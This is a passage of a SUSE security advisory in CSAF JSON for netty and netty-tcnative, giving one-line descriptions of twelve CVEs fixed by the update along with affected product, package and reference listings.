| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
References
52 references
| URL | Category |
|---|---|
| https://www.suse.com/support/security/rating/ | external |
| https://ftp.suse.com/pub/projects/security/csaf/s… | self |
| https://www.suse.com/support/update/announcement/… | self |
| https://lists.suse.com/pipermail/sle-updates/2026… | self |
| https://bugzilla.suse.com/1264350 | self |
| https://bugzilla.suse.com/1265243 | self |
| https://bugzilla.suse.com/1265245 | self |
| https://bugzilla.suse.com/1265246 | self |
| https://bugzilla.suse.com/1265272 | self |
| https://bugzilla.suse.com/1265273 | self |
| https://bugzilla.suse.com/1265277 | self |
| https://bugzilla.suse.com/1265279 | self |
| https://bugzilla.suse.com/1265280 | self |
| https://bugzilla.suse.com/1265292 | self |
| https://bugzilla.suse.com/1265294 | self |
| https://bugzilla.suse.com/1265318 | self |
| https://www.suse.com/security/cve/CVE-2026-41417/ | self |
| https://www.suse.com/security/cve/CVE-2026-42578/ | self |
| https://www.suse.com/security/cve/CVE-2026-42579/ | self |
| https://www.suse.com/security/cve/CVE-2026-42580/ | self |
| https://www.suse.com/security/cve/CVE-2026-42581/ | self |
| https://www.suse.com/security/cve/CVE-2026-42582/ | self |
| https://www.suse.com/security/cve/CVE-2026-42583/ | self |
| https://www.suse.com/security/cve/CVE-2026-42584/ | self |
| https://www.suse.com/security/cve/CVE-2026-42585/ | self |
| https://www.suse.com/security/cve/CVE-2026-42586/ | self |
| https://www.suse.com/security/cve/CVE-2026-42587/ | self |
| https://www.suse.com/security/cve/CVE-2026-44248/ | self |
| https://www.suse.com/security/cve/CVE-2026-41417 | external |
| https://bugzilla.suse.com/1264350 | external |
| https://www.suse.com/security/cve/CVE-2026-42578 | external |
| https://bugzilla.suse.com/1265243 | external |
| https://www.suse.com/security/cve/CVE-2026-42579 | external |
| https://bugzilla.suse.com/1265272 | external |
| https://www.suse.com/security/cve/CVE-2026-42580 | external |
| https://bugzilla.suse.com/1265273 | external |
| https://www.suse.com/security/cve/CVE-2026-42581 | external |
| https://bugzilla.suse.com/1265277 | external |
| https://www.suse.com/security/cve/CVE-2026-42582 | external |
| https://bugzilla.suse.com/1265318 | external |
| https://www.suse.com/security/cve/CVE-2026-42583 | external |
| https://bugzilla.suse.com/1265279 | external |
| https://www.suse.com/security/cve/CVE-2026-42584 | external |
| https://bugzilla.suse.com/1265280 | external |
| https://www.suse.com/security/cve/CVE-2026-42585 | external |
| https://bugzilla.suse.com/1265291 | external |
| https://www.suse.com/security/cve/CVE-2026-42586 | external |
| https://bugzilla.suse.com/1265245 | external |
| https://www.suse.com/security/cve/CVE-2026-42587 | external |
| https://bugzilla.suse.com/1265246 | external |
| https://www.suse.com/security/cve/CVE-2026-44248 | external |
| https://bugzilla.suse.com/1265293 | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for netty, netty-tcnative",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for netty, netty-tcnative fixes the following issues\n\n- CVE-2026-41417: missing validations leads to HTTP request smuggling and RTSP request injection via start-line\n injection in `DefaultHttpRequest.setUri()` (bsc#1264350).\n- CVE-2026-42578: HTTP Header Injection via HttpProxyHandler Disabled Validation in Netty (bsc#1265243).\n- CVE-2026-42579: DNS codec does not enforce RFC 1035 domain name constraints during either encoding or decoding\n (bsc#1265272).\n- CVE-2026-42580: chunk size parser silently overflows int and enables request smuggling attacks (bsc#1265273).\n- CVE-2026-42581: TE+CL header coexistence in HTTP/1.0 requests bypasses smuggling sanitization (bsc#1265277).\n- CVE-2026-42583: resource exhaustion and possible denial of service via `Lz4FrameDecoder` (bsc#1265279).\n- CVE-2026-42584: improper handling of inbound responses in `HttpClientCodec` can lead to response desynchronization\n (bsc#1265280).\n- CVE-2026-42585: Netty is an asynchronous, event-driven network application framework (bsc#1265292).\n- CVE-2026-42586: CRLF Injection in Netty Redis Codec Encoder (bsc#1265245).\n- CVE-2026-42587: HttpContentDecompressor maxAllocation bypass via Content-Encoding: br/zstd/snappy enables\n decompression bomb DoS (bsc#1265246).\n- CVE-2026-44248: Netty is an asynchronous, event-driven network application framework (bsc#1265294).\n- CVE-2026-42582: HTTP/3 QPACK literal unbounded allocation (bsc#1265318). \n\nChanges for netty:\n\n- Upgrade to upstream version 4.1.133\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-2308,SUSE-SLE-Module-Development-Tools-15-SP7-2026-2308,SUSE-SLE-Module-Packagehub-Subpackages-15-SP7-2026-2308,SUSE-SLE-Product-HPC-15-SP4-ESPOS-2026-2308,SUSE-SLE-Product-HPC-15-SP4-LTSS-2026-2308,SUSE-SLE-Product-HPC-15-SP5-ESPOS-2026-2308,SUSE-SLE-Product-HPC-15-SP5-LTSS-2026-2308,SUSE-SLE-Product-SLES-15-SP4-LTSS-2026-2308,SUSE-SLE-Product-SLES-15-SP5-LTSS-2026-2308,SUSE-SLE-Product-SLES-15-SP6-LTSS-2026-2308,SUSE-SLE-Product-SLES_SAP-15-SP4-2026-2308,SUSE-SLE-Product-SLES_SAP-15-SP5-2026-2308,SUSE-SLE-Product-SLES_SAP-15-SP6-2026-2308",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_2308-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:2308-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20262308-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:2308-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2026-June/047194.html"
},
{
"category": "self",
"summary": "SUSE Bug 1264350",
"url": "https://bugzilla.suse.com/1264350"
},
{
"category": "self",
"summary": "SUSE Bug 1265243",
"url": "https://bugzilla.suse.com/1265243"
},
{
"category": "self",
"summary": "SUSE Bug 1265245",
"url": "https://bugzilla.suse.com/1265245"
},
{
"category": "self",
"summary": "SUSE Bug 1265246",
"url": "https://bugzilla.suse.com/1265246"
},
{
"category": "self",
"summary": "SUSE Bug 1265272",
"url": "https://bugzilla.suse.com/1265272"
},
{
"category": "self",
"summary": "SUSE Bug 1265273",
"url": "https://bugzilla.suse.com/1265273"
},
{
"category": "self",
"summary": "SUSE Bug 1265277",
"url": "https://bugzilla.suse.com/1265277"
},
{
"category": "self",
"summary": "SUSE Bug 1265279",
"url": "https://bugzilla.suse.com/1265279"
},
{
"category": "self",
"summary": "SUSE Bug 1265280",
"url": "https://bugzilla.suse.com/1265280"
},
{
"category": "self",
"summary": "SUSE Bug 1265292",
"url": "https://bugzilla.suse.com/1265292"
},
{
"category": "self",
"summary": "SUSE Bug 1265294",
"url": "https://bugzilla.suse.com/1265294"
},
{
"category": "self",
"summary": "SUSE Bug 1265318",
"url": "https://bugzilla.suse.com/1265318"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-41417 page",
"url": "https://www.suse.com/security/cve/CVE-2026-41417/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42578 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42578/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42579 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42579/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42580 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42580/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42581 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42581/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42582 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42582/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42583 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42583/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42584 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42584/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42585 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42585/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42586 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42586/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42587 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42587/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-44248 page",
"url": "https://www.suse.com/security/cve/CVE-2026-44248/"
}
],
"title": "Security update for netty, netty-tcnative",
"tracking": {
"current_release_date": "2026-06-09T08:13:58Z",
"generator": {
"date": "2026-06-09T08:13:58Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:2308-1",
"initial_release_date": "2026-06-09T08:13:58Z",
"revision_history": [
{
"date": "2026-06-09T08:13:58Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-150200.4.46.1.aarch64",
"product": {
"name": "netty-4.1.133-150200.4.46.1.aarch64",
"product_id": "netty-4.1.133-150200.4.46.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"product": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"product_id": "netty-tcnative-2.0.77-150200.3.39.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-tcnative-openssl-dynamic-2.0.77-150200.3.39.1.aarch64",
"product": {
"name": "netty-tcnative-openssl-dynamic-2.0.77-150200.3.39.1.aarch64",
"product_id": "netty-tcnative-openssl-dynamic-2.0.77-150200.3.39.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-150200.4.46.1.i586",
"product": {
"name": "netty-4.1.133-150200.4.46.1.i586",
"product_id": "netty-4.1.133-150200.4.46.1.i586"
}
},
{
"category": "product_version",
"name": "netty-tcnative-2.0.77-150200.3.39.1.i586",
"product": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.i586",
"product_id": "netty-tcnative-2.0.77-150200.3.39.1.i586"
}
},
{
"category": "product_version",
"name": "netty-tcnative-openssl-dynamic-2.0.77-150200.3.39.1.i586",
"product": {
"name": "netty-tcnative-openssl-dynamic-2.0.77-150200.3.39.1.i586",
"product_id": "netty-tcnative-openssl-dynamic-2.0.77-150200.3.39.1.i586"
}
}
],
"category": "architecture",
"name": "i586"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-bom-4.1.133-150200.4.46.1.noarch",
"product": {
"name": "netty-bom-4.1.133-150200.4.46.1.noarch",
"product_id": "netty-bom-4.1.133-150200.4.46.1.noarch"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-150200.4.46.1.noarch",
"product": {
"name": "netty-javadoc-4.1.133-150200.4.46.1.noarch",
"product_id": "netty-javadoc-4.1.133-150200.4.46.1.noarch"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-150200.4.46.1.noarch",
"product": {
"name": "netty-parent-4.1.133-150200.4.46.1.noarch",
"product_id": "netty-parent-4.1.133-150200.4.46.1.noarch"
}
},
{
"category": "product_version",
"name": "netty-tcnative-javadoc-2.0.77-150200.3.39.1.noarch",
"product": {
"name": "netty-tcnative-javadoc-2.0.77-150200.3.39.1.noarch",
"product_id": "netty-tcnative-javadoc-2.0.77-150200.3.39.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-150200.4.46.1.ppc64le",
"product": {
"name": "netty-4.1.133-150200.4.46.1.ppc64le",
"product_id": "netty-4.1.133-150200.4.46.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"product": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"product_id": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-tcnative-openssl-dynamic-2.0.77-150200.3.39.1.ppc64le",
"product": {
"name": "netty-tcnative-openssl-dynamic-2.0.77-150200.3.39.1.ppc64le",
"product_id": "netty-tcnative-openssl-dynamic-2.0.77-150200.3.39.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-150200.4.46.1.s390x",
"product": {
"name": "netty-4.1.133-150200.4.46.1.s390x",
"product_id": "netty-4.1.133-150200.4.46.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-tcnative-2.0.77-150200.3.39.1.s390x",
"product": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.s390x",
"product_id": "netty-tcnative-2.0.77-150200.3.39.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-tcnative-openssl-dynamic-2.0.77-150200.3.39.1.s390x",
"product": {
"name": "netty-tcnative-openssl-dynamic-2.0.77-150200.3.39.1.s390x",
"product_id": "netty-tcnative-openssl-dynamic-2.0.77-150200.3.39.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-150200.4.46.1.x86_64",
"product": {
"name": "netty-4.1.133-150200.4.46.1.x86_64",
"product_id": "netty-4.1.133-150200.4.46.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"product": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"product_id": "netty-tcnative-2.0.77-150200.3.39.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-tcnative-openssl-dynamic-2.0.77-150200.3.39.1.x86_64",
"product": {
"name": "netty-tcnative-openssl-dynamic-2.0.77-150200.3.39.1.x86_64",
"product_id": "netty-tcnative-openssl-dynamic-2.0.77-150200.3.39.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-development-tools:15:sp7"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:packagehub:15:sp7"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-espos:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle_hpc-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 15 SP6-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP6-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:15:sp6"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp4"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product_id": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles_sap:15:sp6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.aarch64 as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.s390x as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.x86_64 as component of SUSE Linux Enterprise Module for Development Tools 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Development Tools 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-150200.4.46.1.aarch64 as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64"
},
"product_reference": "netty-4.1.133-150200.4.46.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-150200.4.46.1.ppc64le as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le"
},
"product_reference": "netty-4.1.133-150200.4.46.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-150200.4.46.1.s390x as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x"
},
"product_reference": "netty-4.1.133-150200.4.46.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-150200.4.46.1.x86_64 as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64"
},
"product_reference": "netty-4.1.133-150200.4.46.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-150200.4.46.1.noarch as component of SUSE Linux Enterprise Module for Package Hub 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch"
},
"product_reference": "netty-javadoc-4.1.133-150200.4.46.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Package Hub 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.aarch64 as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le as component of SUSE Linux Enterprise Server 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le"
},
"product_reference": "netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
